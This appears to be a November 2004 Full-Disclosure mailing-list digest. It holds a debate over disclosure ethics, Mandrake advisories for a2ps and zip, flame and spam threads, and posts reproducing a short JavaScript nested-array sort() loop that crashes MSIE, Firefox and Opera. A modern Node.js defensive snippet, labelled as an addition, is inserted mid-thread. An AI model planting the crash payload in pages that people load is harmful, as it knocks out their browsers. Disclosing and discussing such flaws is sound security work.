 So instead you unleash it upon kiddie and spammer world? That's lovely.

 Some people are advocates of this or that disclosure mechanism, and
 believe they are right. I can bite.
 You just say: I'm so cool. I will release this, get a ton of attention
 and then say 'hey! They violated GPL! How dare they?!'

He didn't have to release it... he could have sold it or any number of 
other things including just exploiting it quietly.  We should stop 
shooting the messenger and say thanks to people who do others' 
debugging for free and for all our own good.

my 2c,
--dr

-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
Vancouver, Canada   May 4-6 2005  http://cansecwest.com
pgpkey http://dragos.com/ kyxpgp



Re: [Full-Disclosure] Fwd: Hi, It's Me !!!!!

2004-11-25 Thread Valdis . Kletnieks
On Thu, 25 Nov 2004 11:52:34 CST, Todd Towles said:
 Could you please not forward your spam to the list. This is a 411
 scam...if you don't know what that is..then please contact this person
 and talk to him.

Looking for information on '419 scams' would probably be more productive.

http://www.secretservice.gov/alert419.shtml





[Full-Disclosure] MDKSA-2004:140 - Updated a2ps packages fix vulnerability

2004-11-25 Thread Mandrake Linux Security Team

 ___

 Mandrakelinux Security Update Advisory
 ___

 Package name:   a2ps
 Advisory ID:MDKSA-2004:140
 Date:   November 25th, 2004

 Affected versions:  10.0, 10.1, 9.2, Corporate Server 2.1
 __

 Problem Description:

 The GNU a2ps utility fails to properly sanitize filenames, which can
 be abused by a malicious user to execute arbitrary commands with the
 privileges of the user running the vulnerable application.
 
 The updated packages have been patched to prevent this problem.
 ___

 References:

  http://www.securityfocus.com/bid/11025
 __

 Updated Packages:
  
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security.  You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  security linux-mandrake.com


[Full-Disclosure] MDKSA-2004:141 - Updated zip packages fix vulnerability

2004-11-25 Thread Mandrake Linux Security Team

 ___

 Mandrakelinux Security Update Advisory
 ___

 Package name:   zip
 Advisory ID:MDKSA-2004:141
 Date:   November 25th, 2004

 Affected versions:  10.0, 10.1, 9.2, Corporate Server 2.1
 __

 Problem Description:

 A vulnerability in zip was discovered where zip would not check the
 resulting path length when doing recursive folder compression, which
 could allow a malicious person to convince a user to create an archive
 containing a specially-crafted path name.  By doing so, arbitrary code
 could be executed with the permissions of the user running zip.
 
 The updated packages are patched to prevent this problem.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1010
  http://www.hexview.com/docs/20041103-1.txt
 __

 Updated Packages:
  
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security.  You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  security linux-mandrake.com



[Full-Disclosure] MSIE FIREFOX flaws: detailed advisory and comments that you probably don't want to read anyway

2004-11-25 Thread Berend-Jan Wever
Skip to the -- Advisory -- part if you are not interested in reading about 
disclosure but you are interested in non-technical details about the array sort 
vulnerability I released.

- Original Message - 
From: Dragos Ruiu [EMAIL PROTECTED]
 He didn't have to release it... he could have sold it or any number of 
 other things including just exploiting it quietly.  We should stop 
 shooting the messenger and say thanks to people who do other's 
 debugging for free and for all our own good.
 
 my 2c,
 --dr
Exactly. And since none of the vulnerable vendors have put out an advisory as 
far as I know, I'll let you all know the impact of this bug myself. For free 
because I don't want you to lose any sleep over a lame crash:

-- Advisory --
Both MSIE and firefox have the same problem handling this. Since a lot of 
people did not understand me when I told you in 1337 h4x0r15h, I'll put it in 
n00b English:

The code I posted makes both browsers use up (stack)memory again and again 
until there is no more left. This causes an exception which cannot be handled 
by both programs so both of them will be terminated: nothing to worry about, 
there is no exploit for this, it just crashes the program.
-- End advisory --

So... it was all a big piece of FUD, which was exactly what I needed to get my 
point across. I do not kid myself that I can convince everybody, but at least I 
got a lot of people thinking and hopefully even more convinced that a lot of 
vendors do not acknowledge independent security researchers for their true value 
and (even more important to a lot of you) do not act upon bugs as fast as is 
needed nowadays.

What if I was without integrity, as some people would have it, and would write 
a worm exploiting some (or all) of the bugs I had found over the years? Think 
about it... I could have sold a worm like that for good money to less 
scrupulous people but instead I chose to disclose all that information 
responsibly.

People that do not agree I disclosed the information on the IFRAME 
vulnerability responsibly are people that could not have gathered the 
information for themselves from the earlier post by ned. Everybody that could 
exploit it (it wasn't that difficult) already knew what I told you and 
probably was exploiting it without you knowing.

I truly am sorry for the people who do not understand my motives or think I 
did wrong. I am even more sorry for people that got hit with InternetExploiter 
and its derivatives. Both should keep in mind that if I had not disclosed 
this, AV/IDS/etc vendors would not have known about/acted upon the problem and 
a patch would have been even lower priority than it seems to be now. Saying 
that there was no problem before I released the exploit code for the IFRAME 
vulnerability is a load of dingo's kidneys. I believe a lot more people could 
have been affected and in much worse ways than they have been now if this had 
remained underground.

Cheer,
SkyLined

PS. Note to self: stop wasting time on useless discussions on the internet.
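The stack exhaustion SkyLined describes above comes from an engine recursing once per nesting level while it converts array elements to strings; here, as an added example that is not part of the original post, is a Node.js depth guard that rejects over-deep input before any recursive routine such as sort(), toString() or JSON.stringify() sees it (buildNested, nestingDepth, safeStringify and unguardedStringify are names of my own, and the deep input is constructed).

```javascript
'use strict';

// Added example (not code from the original post). The 2004 crash comes from
// an engine recursing once per nesting level while it converts array elements
// to strings for sort(); the same recursion exists today in String(a) or
// JSON.stringify(a) on a deeply nested array, where modern engines throw a
// RangeError rather than terminating. The defensive pattern below measures
// nesting depth iteratively and refuses over-deep input before any recursive
// routine touches it.

// Build an array nested `levels` levels deep inside an outer array:
// buildNested(0) is [], buildNested(2) is [[[]]]. Same construction as the
// list post, without the infinite loop.
function buildNested(levels) {
  let a = [];
  for (let i = 0; i < levels; i++) a = [a];
  return a;
}

// Nesting depth of `value`: 0 for a non-array, 1 for [], 2 for [[]], and so
// on. Uses an explicit work stack instead of recursion, so hostile depth can
// never exhaust the call stack here. Returns as soon as the depth exceeds
// `limit`, so over-deep input costs at most limit+1 levels of work.
function nestingDepth(value, limit) {
  let max = 0;
  const work = [[value, 1]];
  while (work.length > 0) {
    const [node, depth] = work.pop();
    if (!Array.isArray(node)) continue;
    if (depth > max) max = depth;
    if (max > limit) return max; // over the limit: no need to keep walking
    for (const child of node) {
      if (Array.isArray(child)) work.push([child, depth + 1]);
    }
  }
  return max;
}

// Guarded conversion: returns the string form, or null when the structure is
// nested deeper than `limit` and must not reach a recursive routine.
function safeStringify(value, limit) {
  if (nestingDepth(value, limit) > limit) return null;
  return String(value);
}

// Unguarded conversion for comparison. Returns 'ok', 'range-error' (the
// engine hit its stack limit and reported it as an exception) or 'other'.
function unguardedStringify(value) {
  try {
    String(value);
    return 'ok';
  } catch (e) {
    return e instanceof RangeError ? 'range-error' : 'other';
  }
}

function demo() {
  const deep = buildNested(100000); // constructed hostile input
  console.log('depth of [1,[2,[3]]]:', nestingDepth([1, [2, [3]]], 10));
  console.log('guarded, limit 1000:', safeStringify(deep, 1000));
  // Typically 'range-error' in Node.js; the 2004 browsers terminated instead.
  console.log('unguarded:', unguardedStringify(deep));
}

demo();
```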




Re: [Full-Disclosure] Why is IRC still around?

2004-11-25 Thread vord
i didn't get responses from anyone i knew ... i got responses from
people who knew you, get it?

btw, our offer still stands. if you would like to try and substantiate
your claims, feel free to come back and try your hardest.

this is over and never should have begun.
DO NOT REPLY. I WILL NOT RESPOND.

--vord

On Thu, 25 Nov 2004 14:49:50 +, n3td3v [EMAIL PROTECTED] wrote:
 On Wed, 24 Nov 2004 21:17:24 -0600, vord [EMAIL PROTECTED] wrote:
 
 
  this is quite possibly the most ridiculous thing ive ever read.
  normally i would respond to it in more detail but i have received
  literally dozens of responses from members of this list who either
  sympathize with my position or have outright called you an
  idiot/lamer. i therefore see no need to defend myself or #hackphreak
  publicly when the public does not require it. they already know you're
  a moron, i dont need to beat a dead horse by making you look the fool
  over and over again.
 
 I'm sure all your script kiddie friends are backing you up, I don't
 doubt it for a second. That doesn't mean you're right, it just means you
 have a lot of script kiddie friends with the same views as yourself. It
 sounds like you've got the script kiddie support of the FD list. What
 an achievement, you must be so proud of yourself, so proud you had to
 post it on FD how many private e-mails you get off-list agreeing with
 you.
 
 If I'm an idiot lamer, I'd hate to hear what they're calling you.
 
 Thanks,
 n3td3v
 




[Full-Disclosure] Mailing lists and unsolicited/malicious spam

2004-11-25 Thread n3td3v
How many people are actually subscribed (on FD) and what are the
general figures for subscribers for high profile mailing lists, has
any figures ever been released? And would the theft of the list of
e-mails subscribed be of value to spammers? I think it would be, I
hope FD admin is up to date with and keeping track of bugs as the
rest of us. If malicious hackers/script kiddies got hold of the list,
I think they would be able to attack a good percentage of inboxes with
whatever they send. Whether it be porn spam or a phishing to take
passwords or if it be malicious code to take advantage of POP mail
clients via SMTP.

I think already FD is targeted by spam/phishing hackers who wish to
collect e-mail addresses for further exploration. Perhaps posting on
FD could be a security risk in itself (well not just FD but mailing
lists online in general) as far as POP mail clients and SMTP is
concerned. (web-based e-mail has its own problems which usually don't
have the risk of taking over computers like mail clients do. Usually
web-based e-mail is just at risk from xss/cookie disclosure/account
theft, whereas malicious code sent to mail clients can take over whole
computer systems)

For those of you who already have a mailing list only e-mail address
and a separate address for work related/corporate/company matters, do
you see a different level of unsolicited spam, compared to the work
address or other private e-mail address for friends and family? I'm
thinking about setting up the same myself, just for experimental
reasons! I think I'll find some differences between the two.

Sorry if you don't care about anti-spam, but it's something I'm
interested in. Sorry to all the script kiddie hax0rs who don't like me
working against you and your e-mail collecting bots!

Plus, do FD admin and other high profile mailing lists have honey pots
or similar methods to catch FD/mailing list born spam? I believe a big
mailing list can have its own domestic/internal spam, separate from
the general internet who are not subscribed to the given mailing list
or lists, and even different mailing lists having its own group of
spammers targeting them, with its own nature of spam/phish/malicious
code exploration.

Thanks, 
n3td3v



Re: [Full-Disclosure] Fwd: Hi, It's Me !!!!!

2004-11-25 Thread Ron
[EMAIL PROTECTED] wrote:
On Thu, 25 Nov 2004 11:52:34 CST, Todd Towles said:

Could you please not forward your spam to the list. This is a 411
scam...if you don't know what that is..then please contact this person
and talk to him.

Looking for information on '419 scams' would probably be more productive
http://www.secretservice.gov/alert419.shtml


A 411 scam is when you call Directory Assistance and ask for, for 
instance, I. P. Freely.

(Yes, that's a joke)


[Full-Disclosure] Re: Opera flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread sergio

Opera Browser (v7.54 for Windows) crashes as well with the mentioned code:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>




Re: [Full-Disclosure] Fwd: Hi, It's Me !!!!!

2004-11-25 Thread Dan Davis
 On Thu, 25 Nov 2004 11:52:34 CST, Todd Towles said:
  Could you please not forward your spam to the list. This is a 411
  scam...if you don't know what that is..then please contact this person
  and talk to him.
 
 Looking for information on '419 scams' would probably be more productive
 
 http://www.secretservice.gov/alert419.shtml

There's also the option of fighting back...
http://www.419eater.com/. Pursue this at your own risk, but it can
lead to some pretty funny results.

Dan



RE: [Full-Disclosure] University Researchers Challenge Bush Win In Florida

2004-11-25 Thread Todd Towles
I asked very nicely...and didn't say it wasn't in some weird way
connected, and normally I do delete the messages I don't want to see. But
I also contact people directly if I feel that the list will have
nothing to add to the talk.  

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Steve Wray
 Sent: Wednesday, November 24, 2004 10:09 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] University Researchers 
 Challenge Bush Win In Florida
 
 Todd Towles wrote:
  Did the charter say something about political 
 messages?..please take 
  it off the list guys if possible...
 
 Actually, I thought that particular post was in the spirit of 
 the list...
 
 It seemed to me to address technologies and methodologies.
 
 I didn't think that it dwelled on party political issues. 
 Though, to be honest, I think Paul should have sent that last 
 one just to the addressee not to the list. But he does come 
 up with some gems so he won't go on my plonkers list :)
 
 If you want to be truly pedantic as to what counts as 
 political, well... 
 there wouldn't be much to choose from. Everything is politics 
 if you squint hard enough.
 
 I find the best method of dealing with full disclosure is 
 that every time you see someone post something you consider 
 off topic or a troll or whatever suits your taste, simply 
 filter their address out.
 
 Filtering by subject doesn't help much as trolls will post to 
 *anything* but trolls *will* post. So as long as I filter out 
 anyone that seems like a troll (or otherwise an idiot) full 
 disclosure comes up with some gems.
 
 And the best part is that if someone on your plonker list 
 says something genuinely interesting, they will doubtless be 
 quoted by someone else so you may still get to read it. And 
 the list has an archive.
 
 Without filters I'd have left FD years ago...
 
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Paul 
 Schmehl
 Sent: Wednesday, November 24, 2004 11:22 AM
 To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] University Researchers 
 Challenge Bush 
 Win In Florida
 
 --On Wednesday, November 24, 2004 05:39:31 AM + Jason Coombs 
 [EMAIL PROTECTED] wrote:
 [massive snip]
 
 
 



Re: [Full-Disclosure] FIREFOX flaws: nested array sort()

2004-11-25 Thread Ron
Sounds like he does it for fun.  That's what I'd do.
RandallM wrote:
So, where do you all stand? Exploit for fame or for purpose?
 

-Original Message-
From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf Of 
Berend-Jan Wever
Sent: 25 November 2004 01:05
To: [EMAIL PROTECTED]; 
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() 
loop Stack overflow exception

Hi all,
Same flaw works for Firefox as well as MSIE:
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Added to the list: 
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

I'd have loved to CC mozilla about this, but I didn't have 
the time to do the crash course how to write a bug report 
and go through all that bugzilla crap.

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
   


Randall M

 



RE: [Full-Disclosure] Mailing lists and unsolicited/malicious spam

2004-11-25 Thread David Taylor
It would be good to see the users' email addresses obfuscated in some
way. 


M2c
[EMAIL PROTECTED]

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Friday, 26 November 2004 11:38 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Mailing lists and unsolicited/malicious spam

How many people are actually subscribed (on FD) and what are the
general figures for subscribers for high profile mailing lists; have
any figures ever been released? And would the theft of the list of
e-mails subscribed be of value to spammers? I think it would be. I
hope FD admin is up to date with and keeping track of bugs like the
rest of us. If malicious hackers/script kiddies got hold of the list,
I think they would be able to attack a good percentage of inboxes with
whatever they send, whether it be porn spam or phishing to take
passwords or malicious code to take advantage of POP mail
clients via SMTP.

I think already FD is targeted by spam/phishing hackers who wish to
collect e-mail addresses for further exploration. Perhaps posting on
FD could be a security risk in itself (well not just FD but mailing
lists online in general) as far as POP mail clients and SMTP is
concerned. (web-based e-mail has its own problems which usually don't
have the risk of taking over computers like mail clients do. Usually
web-based e-mail is just at risk from xss/cookie disclosure/account
theft, whereas malicious code sent to mail clients can take over whole
computer systems)

For those of you who already have a mailing list only e-mail address
and a separate address for work related/corporate/company matters, do
you see a different level of unsolicited spam, compared to the work
address or other private e-mail address for friends and family? I'm
thinking about setting up the same myself, just for experimental
reasons! I think I'll find some differences between the two.

Sorry if you don't care about anti-spam, but it's something I'm
interested in. Sorry to all the script kiddie hax0rs who don't like me
working against you and your e-mail collecting bots!

Plus, do FD admin and other high profile mailing lists have honey pots
or similar methods to catch FD/mailing list borne spam? I believe a big
mailing list can have its own domestic/internal spam, separate from
the general internet users who are not subscribed to the given mailing list
or lists, and even different mailing lists having their own group of
spammers targeting them, with its own nature of spam/phish/malicious
code exploration.

Thanks, 
n3td3v



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Why is IRC still around?

2004-11-25 Thread n3td3v
On Thu, 25 Nov 2004 18:34:03 -0600, vord [EMAIL PROTECTED] wrote:
 i didn't get responses from anyone i knew ... i got responses from
 people who knew you, get it?
 
 btw, our offer still stands. if you would like to try and substantiate
 your claims, feel free to come back and try your hardest.
 
 this is over and never should have begun.
 DO NOT REPLY. I WILL NOT RESPOND.
 
 --vord

Ok, I won't reply to call you and this e-mail childish.

Too bad, my finger slipped.

Thanks,
n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html